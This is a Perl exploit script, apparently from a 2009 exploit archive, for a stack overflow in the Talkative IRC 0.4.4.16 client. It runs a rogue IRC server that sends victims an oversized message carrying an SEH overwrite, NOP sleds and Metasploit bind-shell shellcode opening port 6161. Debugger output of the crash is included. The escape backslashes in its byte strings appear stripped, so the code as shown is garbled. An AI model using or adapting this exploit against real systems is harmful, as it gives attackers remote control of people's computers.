#!/usr/bin/perl
#
# Title: Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)
#
# Summary: The easiest and fastest way to meet people online. With Talkative IRC you can
# chat with thousands of people at the same time. Find people with the same interests as you.
# Join channels where you can meet people speaking your language, or start your own. No
# monthly fees or other hassle, just a download and a click. Version 0.4.4.16 makes nick list
# font customizable. Why Talkative? Mainly because it's secure, stable and easy to use.
#
# Product web page: http://www.talkative-irc.com/
#
# Desc: Talkative IRC 0.4.4.16 suffers from a stack based buffer overflow vulnerability that enables us
# to gain full control over the application and execute arbitrary commands. ECX and EIP registers gets
# overwriten, so does the SEH.
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Ref: http://www.milw0rm.com/exploits/6654
#
#
#---------------------------------------------windbg output--------------------------------------------------
#
# (398.ca4): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Unknown exception - code 0eedfade (first chance)
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0013f0d0 edx=00000008 esi=00000000 edi=00421c40
# eip=004d8260 esp=0013f08c ebp=0013f1c4 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0xd8260:
# 004d8260 8b40f0          mov     eax,dword ptr [eax-10h] ds:0023:41414131=????????
# 0:000> g
# (398.3f8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=42424242 edx=7c9037d8 esi=00000000 edi=00000000
# eip=42424242 esp=0013ecbc ebp=0013ecdc iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 42424242 ??              ???
#
#---------------------------------------------windbg output--------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# http://www.zeroscience.org/
#
# liquidworm {z} gmail {z} com
#
# 17.03.2009
#

use IO::Socket;

sub start_zerver()
{
	my $sock = new IO::Socket::INET(
					Listen	   =>	1,
					LocalAddr   =>	'localhost',
					LocalPort	   =>	6667,
					Proto	   =>	'tcp'
					);
			die unless $sock;

header();

print "n [*] Evil IRC Server started on port 6667n";

my $wire = $sock -> accept();  

my $junky = "A" x 272;
my $next_seh = "xebx06x90x90";
my $seh = "x9ax72x85x7c";	#0x7C85729A pop pop ret kernel32.dll 
my $nop_start = "x90" x 25;
my $nop_end = "x90" x 10;

# win32_bind -  EXITFUNC=seh LPORT=6161 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
		"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
		"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
		"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
		"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
		"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
		"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx58".
		"x4ex46x46x42x46x32x4bx48x45x54x4ex33x4bx58x4ex37".
		"x45x50x4ax57x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58".
		"x4fx35x42x32x41x30x4bx4ex49x34x4bx48x46x33x4bx48".
		"x41x30x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c".
		"x46x37x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e".
		"x46x4fx4bx53x46x55x46x52x4ax42x45x37x45x4ex4bx58".
		"x4fx45x46x52x41x30x4bx4ex48x46x4bx38x4ex30x4bx54".
		"x4bx48x4fx35x4ex41x41x50x4bx4ex43x30x4ex42x4bx48".
		"x49x58x4ex36x46x32x4ex31x41x56x43x4cx41x33x4bx4d".
		"x46x36x4bx38x43x54x42x43x4bx38x42x54x4ex30x4bx58".
		"x42x57x4ex41x4dx4ax4bx38x42x34x4ax30x50x35x4ax56".
		"x50x48x50x54x50x30x4ex4ex42x35x4fx4fx48x4dx48x56".
		"x43x55x48x46x4ax46x43x33x44x53x4ax56x47x37x43x47".
		"x44x33x4fx35x46x45x4fx4fx42x4dx4ax36x4bx4cx4dx4e".
		"x4ex4fx4bx33x42x35x4fx4fx48x4dx4fx35x49x38x45x4e".
		"x48x46x41x48x4dx4ex4ax50x44x30x45x45x4cx56x44x50".
		"x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x35".
		"x4fx4fx48x4dx43x45x43x35x43x55x43x45x43x45x43x34".
		"x43x35x43x54x43x35x4fx4fx42x4dx48x56x4ax36x4ax51".
		"x41x51x48x46x43x55x49x38x41x4ex45x39x4ax46x46x4a".
		"x4cx51x42x37x47x4cx47x45x4fx4fx48x4dx4cx36x42x31".
		"x41x35x45x35x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x42".
		"x49x4ex47x35x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d".
		"x4ax56x45x4ex49x44x48x38x49x34x47x35x4fx4fx48x4d".
		"x42x55x46x35x46x45x45x35x4fx4fx42x4dx43x59x4ax46".
		"x47x4ex49x37x48x4cx49x37x47x35x4fx4fx48x4dx45x35".
		"x4fx4fx42x4dx48x36x4cx56x46x56x48x46x4ax36x43x36".
		"x4dx56x49x48x45x4ex4cx56x42x35x49x45x49x42x4ex4c".
		"x49x38x47x4ex4cx46x46x34x49x58x44x4ex41x53x42x4c".
		"x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x34x4ex52".
		"x43x59x4dx48x4cx57x4ax53x4bx4ax4bx4ax4bx4ax4ax56".
		"x44x37x50x4fx43x4bx48x31x4fx4fx45x37x46x34x4fx4f".
		"x48x4dx4bx45x47x55x44x55x41x35x41x45x41x45x4cx56".
		"x41x50x41x45x41x55x45x55x41x45x4fx4fx42x4dx4ax46".
		"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx56".
		"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x35x4ex4f".
		"x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d".
		"x4ax36x42x4fx4cx48x46x30x4fx45x43x45x4fx4fx48x4d".
		"x4fx4fx42x4dx5a";

print " [*] Throwing payload...rn";
  
print $wire ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network joxrn"; 

sleep(1);

print $wire ":" . "$junky" . "$next_seh" . "$seh" . "$nop_start" . "$shellcode" . "$nop_end" . " PRIVMSG t00t : /FINGER w00t.rn";
}

while (1)
{
	start_zerver();
	print " [*] Talkative IRC client successfully exploited!rnn";
	print " [**] Check shell on port 6161! [**]rn";
	next;
}

sub header()
{
	print "n";
	print "~" x 80;
	print "n";
	print "	Talkative IRC v0.4.4.16 Remote Stack Overflow Exploit (SEH)n";
	print "			by LiquidWorm (c) 2009nn";
	print "~" x 80;
	print "nn";
}

# www.Syue.com [2009-03-17]